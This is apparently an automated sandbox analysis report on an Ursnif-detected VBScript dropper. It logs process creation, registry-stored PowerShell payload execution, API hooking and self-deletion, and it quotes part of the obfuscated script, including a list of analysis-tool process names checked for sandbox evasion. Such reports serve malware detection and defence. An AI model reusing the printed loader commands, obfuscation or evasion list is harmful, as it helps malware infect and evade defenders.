            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline'Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline'Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD10C.tmp' 'c:\Users\user\AppData\Local\Temp\xuilsqrn\CSCD8A4030A3E546C3B2CF916F018EDC0.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE214.tmp' 'c:\Users\user\AppData\Local\Temp\iaweong2\CSC9F4D0947F3074F27AD7E2B0574F6C6A.TMP'
            Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\cmd.exe cmd /C 'nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\8F31.bi1'
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\explorer.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001A.00000002.862111096.000001E464460000.00000002.00000001.sdmp, csc.exe, 0000001C.00000002.878013598.00000197D35E0000.00000002.00000001.sdmp
            Source: Binary string: 2.pdb source: powershell.exe, 00000018.00000003.923984098.000001B4AFB9A000.00000004.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000020.00000002.1313166941.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: 2.pdbIR source: powershell.exe, 00000018.00000003.923984098.000001B4AFB9A000.00000004.00000001.sdmp
            Source: Binary string: n.pdbaP source: powershell.exe, 00000018.00000003.923984098.000001B4AFB9A000.00000004.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000020.00000002.1313166941.0000000005A00000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject("Scripting.FileSystemObject")REM highwaymen Cinderella. 2193015 gummy market surjection sculptural warty cotman cliff ketch stroke medial gaslight mandate papyrus calcareous colonist Pearson expulsion Rembrandt krypton Huber debility geodetic vocabularian sour roe inoculate heathenish hearty crystalline oldster Tamil price masochist Bruce ecumenist puree McLeod divorce Muenster landslide committed inhabitation sixfold aluminate larceny pragmatism Sturbridge659 octogenarian cress. campground Giuliano lute Taipei valedictorian Koppers cit. 9962460 celebrant liaison posable shutdown mobcap fit pore wapato. adipic readout Bailey brokerage plausible intoxicant Copernican parsimonious entice razorback Canis. foamflower increase inception requisite contemporaneous switchboard. heaven. 1854466 talky Siegfried, phylogenetic weasel asymmetry phloem ingrained Moiseyev TILpy.DeleteFile WScript.ScriptFullName, TrueEnd FunctionFunction DJTznna()on error resume nextIf (InStr(WScript.ScriptName, cStr(262827114)) > 0 And NEdZn = 0) ThenExit FunctionREM EEOC taxonomy. guanidine oncoming telephonic uttermost silken Afrikaans Dominique southern Menelaus Dortmund garter804. repellent burglary Sergei job dad tram bonnet. 4263459 Liz accordant fascism grapple prodigal polytope ascomycetes. municipal katydid throaty youngster. Jeremiah Sheehan squall, ostrich invigorate lossy. scops exempt retrospect, 82121 erudite PhD Helmholtz End IfREM seaside melanoma slaughter gavotte turbidity nob, infirmary promulgate cultural. 2883954 Guinevere conceit aviatrix agribusiness, 3430970 knoll clock extract Effie snakeroot kale inconsiderable poison julep coverall poodle farm, prim sadist bristlecone squaw skimp bullet logician inopportune ferry term legend aborigine capitulate journalese demand Mudd label switchblade dreary move Russo clipboard Benny denote Calhoun technic fortyfold urge Pusan committee. 9589938 sextic flounder Friedrich652 Malawi Agnes respirator basketball mud Hokan, Cameroun sportsman638 Hansen Sal nickname interstitial moor invariable pregnant countersink subterfuge ' mozzarella183 quintessential nourish sardonic incoherent indy legend513 probe. narcissist Delmarva alma Josef tutor episode Coronado Poynting strata weatherstripping coquina Sims querulous Clarendon alba connotative. pansy advent vex Brittany thicket meteor picofarad contingent inaccuracy sustenance ashore bookishproc = ((95 + 2327.0) - (4 + (37 + 2381.0)))shivery = Array("frida-winjector-helper-64.exe","frida-winjector-helper-32.exe","pythonw.exe","pyw.exe","cmdvirth.exe","alive.exe","filewatcherservice.exe","ngvmsvc.exe","sandboxierpcss.exe","analyzer.exe","fortitracer.exe","nsverctl.exe","sbiectrl.exe","angar2.exe","goatcasper.exe","ollydbg.exe","sbiesvc.exe","apimonitor.exe","GoatClientApp.exe","peid.exe","scanhost.exe","apispy.exe","hiew32.exe","perl.exe","scktool.exe","apispy32.exe","hookanaapp.exe","petools.exe","sdclt.exe","asura.exe","hookexplorer.exe","pexplor
            Suspicious powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))Jump to behavior
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.cmdline'Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.cmdline'Jump to behavior
            Source: C:\Windows\explorer.exeCode function: 32_2_04DA4DCD push 3B000001h; retf 32_2_04DA4DD2

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\iaweong2\iaweong2.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\xuilsqrn\xuilsqrn.dllJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\earmark.avchdJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\earmark.avchdJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000002.00000003.882736166.0000000001040000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719373287.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719415680.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000018.00000003.882332819.000001B4AFFA0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.817982563.00000000052EF000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.718993009.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719443986.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000025.00000002.1294500412.000001DA4C27E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000022.00000002.1296954401.0000027D4F83E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719331728.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000020.00000002.1311153355.0000000004DDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719519037.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.923726669.0000000000C70000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719248205.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.762861604.00000000053ED000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719501128.0000000005668000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000003.719850328.00000000054EB000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.1296813994.000001B4FAD4E000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5976, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\0xyz4ry0opa2.vbsJump to behavior
            Hooks registry keys query functions (used to hide registry keys)Show sources
            Source: explorer.exeIAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
            Modifies the export address table of user mode modules (user mode EAT hooks)Show sources
            Source: explorer.exeIAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFABB03521C
            Modifies the import address table of user mode modules (user mode IAT hooks)Show sources
            Source: explorer.exeEAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFABB035200
            Modifies the prolog of user mode functions (user mode inline hooks)Show sources
            Source: explorer.exeUser mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\control.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)Show sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_LogicalDisk
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEP>
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.680520105.0000014D5D063000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.680628233.0000014D5D042000.00000004.00000001.sdmpBinary or memory string: BEHAVIORDUMPER.EXE@Q
            Source: wscript.exe, 00000000.00000003.677367859.0000014D5D067000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
